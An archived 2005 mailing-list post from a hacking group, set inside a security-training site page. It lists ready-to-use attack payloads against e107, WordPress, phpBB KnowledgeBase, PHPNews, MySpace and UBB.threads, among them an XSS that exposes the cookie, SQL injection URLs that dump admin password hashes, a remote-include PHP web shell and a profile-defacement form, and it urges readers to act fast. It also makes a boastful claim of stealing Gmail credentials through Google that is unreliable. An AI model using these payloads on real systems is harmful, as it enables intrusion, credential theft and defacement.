Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Multiple CMS/Forum Vulnablilties

from [pacifico\", 0] //--></script>a] Network Security [Permanent Link]
Subject: Multiple CMS/Forum Vulnablilties
Date: Sat, 27 Aug 2005 20:36:10 -0400 
################################## Multi-CMS/Forum Vulnability's ##     Found 
by ap0c hackers     ##      pacifico & ratboy        
##################################
Yo! Ok, well a couple new vulnabilitys have been found by.. us :)
------------------First; e107 xss---------------------
 
[link=http://w000000w00tw00t/asdadLI[link=onMouseOver='alert(document.cookie);' 
h1d3="]<[size=24]HIGHLIGHTME!!11!1!!!!!1111!!!!!!11!!1!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![/size]>[/link][link=h1d3me=']][/link][/link]
 Enter this into any message, signature, et cetra, and when highlightedit will 
alert with the users cookie. This *may* be furtherlyexploitable; but we are not 
sure; as we've been very busy ;)
------next; wordpress blog sql injection ---------
http://path/to/wordpress/index.php?cat=%2527%20UNION%20SELECT%20CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58))%20FROM%20wp_users/*
This will give the administrator hash for the wordpress blog/CMS. Wehave also 
found that if you spoof you're browser to something like:<?php phpinfo(); ?>, 
and have a failed login attempt; it is eval'd,and you can execute your own code.
------Now; PHPNews latest release remote include(); exploit------
http://path/to/php/news/auth.php?path=http://path/to/exploit/&c=uname%20-a
Ok, now you'll need a host, and change (http://path/to/exploit/) toyour host. 
Now, you will make a directory called "languages". Then ina file named 
"en_GB.admin.lng", put something like this code:
<?php $rawr=$_GET['c'];echo(`$rawr`);?>
kthx.

-----And; Knoledge Base PHPBB Mod SQL Injection Exploit-----
Righto.. so you find a phpbb forum that says: 'Powered by KnowledgeBase MOD, 
wGEric & Haplo (c) 2002-2005' at the bottem, eh?
Now, this is totally vulnable. (the mod changes the index.php to 
kb.php)http://path/to/forum/kb.php?mode=article&k=10%20UNION%20SELECT%200,user_password%20FROM%20phpbb_users%20WHERE%20user_id=2%20LIMIT%201/*%20&rush=%00
:)

-----!!!!!!Google.com!!!!!SQL!!!!!Injection!!!!!Exploit!!!!!!-----
Ok, we expect this to be fixed right away, so be sure to do it quick ;)Giving 
google the query: -b: *++*' UNION SELECT ass,ass from ASS,ass%00/*Cause's an 
error of "database gm-google.ass does not exist". We'vegotten a few user/pass's 
for gmail with this ;)This is done by confusing googles "calculator", so it 
does *NOT* checkthe query to make sure its valid.
You'd be suprised how insecure google is; when looked at closly. Wealso had a 
bindshell; but they found out; and thats fixed now.

-----MySpace.com User Profile Defacement.-----
Once again, this may be fixed very soon.This code should be efficent;
<?php $g1=$_GET['t'];$g2=$_GET['f'];
echo('  <form 
action="http://myspace.com/index.cfm?fuseaction=user.addComment"method="post"; 
name="commentForm">                                                 <input 
type="hidden" 
name="hashcode"value="MIGKBgkrBgEEAYI3WAOgfTB7BgorBgEEAYI3WAMBoG0wawIDAgABAgJmAwICAMAECGU6VlkoYLOqBBCZiLLKnlWybUUua3SB/xxzBED1fsg4c0zRcY4B8IWZgNbTdYkd/pUk6zpuLXZZAhwC+oxKfrwgQfy+Qnj7XB4pXWTRvgumgCUHsjtspz8/kt6a">
                       <input type="hidden" name="FriendID" value="' . $f . 
'24822493">                        <input type=hidden name=Mytoken value=' . $t 
. '>
');
echo ('<input type="hidden" 
name="f_comments"value='%3C%2FTD%3E%3C%2FTABLE%3E%3C%2FTD%3E%3C%2FTD%3E%3C%2FTABLE%3E%3C%2FTABLE%3E%3CTR%3E%3Cimg%20src%3D%22http%3A%2F%2Flemonparty.org%2Flemonparty.jpg%22%3E%3CFONT%20SIZE%3D%2224%22%20COLOR%3D%22RED%22%3E%3Cmarquee%20bgcolor%3D%22black%22%20direction%3D%22down%22%3Eowned.%3CBR%3E%3Cmarquee%20bgcolor%3D%22black%22%20direction%3D%22left%22%3Eby.%3CBR%3E%3Cmarquee%20bgcolor%3D%22black%22%20direction%3D%22up%22%3Eap0c.%3C%2Fmarquee%3E%3CBR%3E%3Cnoscript%3E'>
                                                                        <input 
type="submit" value="Post Comment" onClick="this.disabled =true; 
document.commentForm.submit();">                        </form>');?>
example url: http://localhost/myspace0wn.php?t=20050827111256&f=6617
This would deface profile 6617 if the (t) variable is that users friend.
ktx.
-----Forums ("UBB.threads™ 6.3.2") Remote Code Execution.-----
These boards are very popular among corporate sites 
(*cough*NBC,CNN*cough*)http://bo**ds.n**.***/bb/printthread.php?Board=%22);&main='));%3C?php%20phpinfo();%20?%3E&type=post
This would execute phpinfo(); on the victims server.
############################  Thats all for this  ####   "issue" of sweet   
####  sploits... sincerly ####  pacifico and ratboy 
############################Contact? jbiaso@gmail.com
-EOF-
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • Multiple CMS/Forum Vulnablilties, pacifico\", 0] //--></script>a <=
Previous by Date:  Land Down Under, bendeniz_avci
Next by Date:  [cosmoshop <= 8.10.78] be the shopadmin in one step, innate
Previous by Thread:  Land Down Under, bendeniz_avci
Next by Thread:  [cosmoshop <= 8.10.78] be the shopadmin in one step, innate
Indexes:  [Date] [Thread] [Top] [All Lists]